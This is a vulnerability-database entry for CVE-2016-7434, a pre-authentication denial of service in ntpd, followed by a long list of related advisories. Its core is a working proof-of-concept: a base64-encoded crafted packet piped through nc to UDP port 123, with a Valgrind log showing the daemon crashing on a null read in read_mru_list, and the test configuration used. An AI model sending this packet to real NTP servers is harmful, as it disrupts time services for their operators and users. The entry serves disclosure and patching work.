Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:92551
HistoryNov 23, 2016 - 12:00 a.m.

ntpd remote pre-auth DoS (CVE-2016-7434)

2016-11-2300:00:00
Root
www.seebug.org
48

0.965 High

EPSS

Percentile

99.6%

JSON

poc

echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\                                
| "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

Valgrind report

$ sudo valgrind ./ntpd/ntpd -n  -c ~/resources/ntp.conf                                      |
| ==5389== Memcheck, a memory error detector                                                   |
| ==5389== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.                     |
| ==5389== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info                  |
| ==5389== Command: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf                            |
| ==5389==                                                                                     |
| 25 Jun 23:07:05 ntpd[5389]: ntpd 4.2[email protected] Sat Jun 25 20:50:30 UTC 2016 (1): Starting |
| 25 Jun 23:07:05 ntpd[5389]: Command line: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf    |
| 25 Jun 23:07:06 ntpd[5389]: proto: precision = 3.605 usec (-18)                              |
| 25 Jun 23:07:06 ntpd[5389]: switching logging to file /dev/null                              |
| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 0 ^6wildcard [::]:123                         |
| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 1 v4wildcard 0.0.0.0:123                      |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 2 lo 127.0.0.1:123                            |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 3 eth0 10.0.1.11:123                          |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 4 eth0:0 1.2.3.4:123                          |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 5 eth9:0 11.11.11.11:123                      |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 6 lo [::1]:123                                |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 7 eth0 [fe80::f2de:f1ff:fe85:75cf%2]:123      |
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 8 eth9 [fe80::a450:8eff:fecc:9c4%3]:123       |
| 25 Jun 23:07:06 ntpd[5389]: Listening on routing socket on fd #25 for interface updates      |
| ==5389== Invalid read of size 1                                                              |
| ==5389==    at 0x4C2C1A2: strlen (vg_replace_strmem.c:412)                                   |
| ==5389==    by 0x45704D: estrdup_impl (emalloc.c:128)                                        |
| ==5389==    by 0x41AF29: read_mru_list (ntp_control.c:4041)                                  |
| ==5389==    by 0x42BB09: receive (ntp_proto.c:659)                                           |
| ==5389==    by 0x4145CF: ntpdmain (ntpd.c:1329)                                              |
| ==5389==    by 0x405A58: main (ntpd.c:392)                                                   |
| ==5389==  Address 0x0 is not stack'd, malloc'd or (recently) free'd                          |
| ==5389==                                                                                     |
| ==5389==                                                                                     |
| ==5389== Process terminating with default action of signal 11 (SIGSEGV)                      |
| ==5389==  Access not within mapped region at address 0x0                                     |
| ==5389==    at 0x4C2C1A2: strlen (vg_replace_strmem.c:412)                                   |
| ==5389==    by 0x45704D: estrdup_impl (emalloc.c:128)                                        |
| ==5389==    by 0x41AF29: read_mru_list (ntp_control.c:4041)                                  |
| ==5389==    by 0x42BB09: receive (ntp_proto.c:659)                                           |
| ==5389==    by 0x4145CF: ntpdmain (ntpd.c:1329)                                              |
| ==5389==    by 0x405A58: main (ntpd.c:392)                                                   |
| ==5389==  If you believe this happened as a result of a stack                                |
| ==5389==  overflow in your program's main thread (unlikely but                               |
| ==5389==  possible), you can try to increase the size of the                                 |
| ==5389==  main thread stack using the --main-stacksize= flag.                                |
| ==5389==  The main thread stack size used in this run was 204800.                            |
| ==5389==                                                                                     |
| ==5389== HEAP SUMMARY:                                                                       |
| ==5389==     in use at exit: 122,458 bytes in 2,707 blocks                                   |
| ==5389==   total heap usage: 2,875 allocs, 168 frees, 411,190 bytes allocated                |
| ==5389==                                                                                     |
| ==5389== LEAK SUMMARY:                                                                       |
| ==5389==    definitely lost: 0 bytes in 0 blocks                                             |
| ==5389==    indirectly lost: 0 bytes in 0 blocks                                             |
| ==5389==      possibly lost: 2,000 bytes in 2 blocks                                         |
| ==5389==    still reachable: 120,458 bytes in 2,705 blocks                                   |
| ==5389==         suppressed: 0 bytes in 0 blocks                                             |
| ==5389== Rerun with --leak-check=full to see details of leaked memory                        |
| ==5389==                                                                                     |
| ==5389== For counts of detected and suppressed errors, rerun with: ->                        |
| ==5389== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

ntp.conf

| server 127.127.1.0 prefer                                                                    |
| fudge  127.127.1.0 stratum 10                                                                |
| driftfile /var/lib/ntp/drift                                                                 |
| broadcastdelay 0.008                                                                         |
|                                                                                              |
| logfile /dev/null                                                                            |
|                                                                                              |
| restrict 127.0.0.1 mask 255.255.255.255 nomodify notrap                                      |

Related

packetstorm 1
f5 2
cve 1
threatpost 1
redhatcve 1
prion 1
cvelist 1
thn 1
openvas 8
hackerone 1
zdt 1
ubuntucve 1
checkpoint_advisories 1
debiancve 1
myhack58 3
nessus 15
exploitpack 1
nvd 1
exploitdb 1
freebsd 2
freebsd_advisory 1
ibm 2
archlinux 1
huawei 1
slackware 1
cert 1
symantec 1
cisco 1
ubuntu 1
cloudfoundry 1
packetstorm
packetstorm
ntpd 4.2.7.p22 / 4.3.0 Denial Of Service
2016-11-22 00:00:00
f5
f5
SOL63326092 - NTP vulnerability CVE-2016-7434
2016-11-29 00:00:00
K63326092 : NTP vulnerability CVE-2016-7434
2016-11-29 00:00:00
cve
cve
CVE-2016-7434
2017-01-13 16:59:00
threatpost
threatpost
Exploit Code Released for NTP Vulnerability
2016-11-22 10:30:41
redhatcve
redhatcve
CVE-2016-7434
2016-11-22 10:47:41
prion
prion
Design/Logic Flaw
2017-01-13 16:59:00
cvelist
cvelist
CVE-2016-7434
2017-01-13 16:00:00
thn
thn
NTP DoS Exploit Released — Update Your Servers to Patch 10 Flaws
2016-11-22 22:49:00
openvas
openvas
NTP.org 'ntpd' 4.2.7p22 - 4.2.8p8, 4.3.0 - 4.3.93 DoS Vulnerability (Nov 2016)
2016-06-03 00:00:00
Slackware: Security Advisory (SSA:2016-326-01)
2022-04-21 00:00:00
NTP.org 'ntpd' 4.0.90 - 4.2.8p8, 4.3.0 - 4.3.93 Multiple Vulnerabilities (Nov 2016)
2016-06-03 00:00:00
hackerone
hackerone
Internet Bug Bounty: ntpd: read_mru_list() does inadequate incoming packet checks
2016-06-25 21:36:45
zdt
zdt
NTP 4.2.8p8 - Denial of Service Exploit
2016-11-23 00:00:00
ubuntucve
ubuntucve
CVE-2016-7434
2017-01-13 00:00:00
checkpoint_advisories
checkpoint_advisories
NTP Daemon _IO_str_init_static_internal Denial of Service (CVE-2016-7434)
2016-11-23 00:00:00
debiancve
debiancve
CVE-2016-7434
2017-01-13 16:59:00
myhack58
myhack58
Doing things the NTP----CVE-2016-7434 vulnerability analysis-vulnerability warning-the black bar safety net
2016-12-03 00:00:00
NTPD denial of service vulnerability, CVE-2016-7434 analysis-vulnerability warning-the black bar safety net
2016-12-17 00:00:00
Doing things the NTP----CVE-2016-7434 vulnerability analysis-vulnerability warning-the black bar safety net
2016-12-03 00:00:00
nessus
nessus
Network Time Protocol Daemon (ntpd) read_mru_list() Remote DoS
2016-11-29 00:00:00
FreeBSD : FreeBSD -- Multiple vulnerabilities of ntp (fcedcdbb-c86e-11e6-b1cf-14dae9d210b8)
2016-12-27 00:00:00
Photon OS 1.0: Ntp PHSA-2017-0003
2019-02-07 00:00:00
exploitpack
exploitpack
NTP 4.2.8p8 - Denial of Service
2016-11-21 00:00:00
nvd
nvd
CVE-2016-7434
2017-01-13 16:59:00
exploitdb
exploitdb
NTP 4.2.8p8 - Denial of Service
2016-11-21 00:00:00
freebsd
freebsd
FreeBSD -- Multiple vulnerabilities of ntp
2016-12-22 00:00:00
ntp -- multiple vulnerabilities
2016-11-21 00:00:00
freebsd_advisory
freebsd_advisory
FreeBSD-SA-16:39.ntp
2016-12-22 00:00:00
ibm
ibm
Security Bulletin: Vulnerabilities in NTP affect IBM Flex System Chassis Management Module (CMM)
2019-01-31 02:25:02
Security Bulletin: Multiple vulnerabilities in ntp affect IBM Flex System Manager (FSM)
2018-06-18 01:36:39
archlinux
archlinux
[ASA-201611-28] ntp: multiple issues
2016-11-26 00:00:00
huawei
huawei
Security Advisory - Multiple NTPd Vulnerabilities in Huawei Products
2017-11-29 00:00:00
slackware
slackware
[slackware-security] ntp
2016-11-21 19:25:10
cert
cert
NTP.org ntpd contains multiple denial of service vulnerabilities
2016-11-21 00:00:00
symantec
symantec
SA139 : November 2016 NTP Security Vulnerabilities
2017-01-12 08:00:00
cisco
cisco
Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products: November 2016
2016-11-23 16:00:00
ubuntu
ubuntu
NTP vulnerabilities
2017-07-05 00:00:00
cloudfoundry
cloudfoundry
USN-3349-1: NTP vulnerabilities | Cloud Foundry
2017-08-04 00:00:00

0.965 High

EPSS

Percentile

99.6%

JSON
Related for SSV:92551
packetstorm1f52cve1threatpost1redhatcve1prion1cvelist1thn1openvas8hackerone1zdt1ubuntucve1checkpoint_advisories1debiancve1myhack583nessus15exploitpack1nvd1exploitdb1freebsd2freebsd_advisory1ibm2archlinux1huawei1slackware1cert1symantec1cisco1ubuntu1cloudfoundry1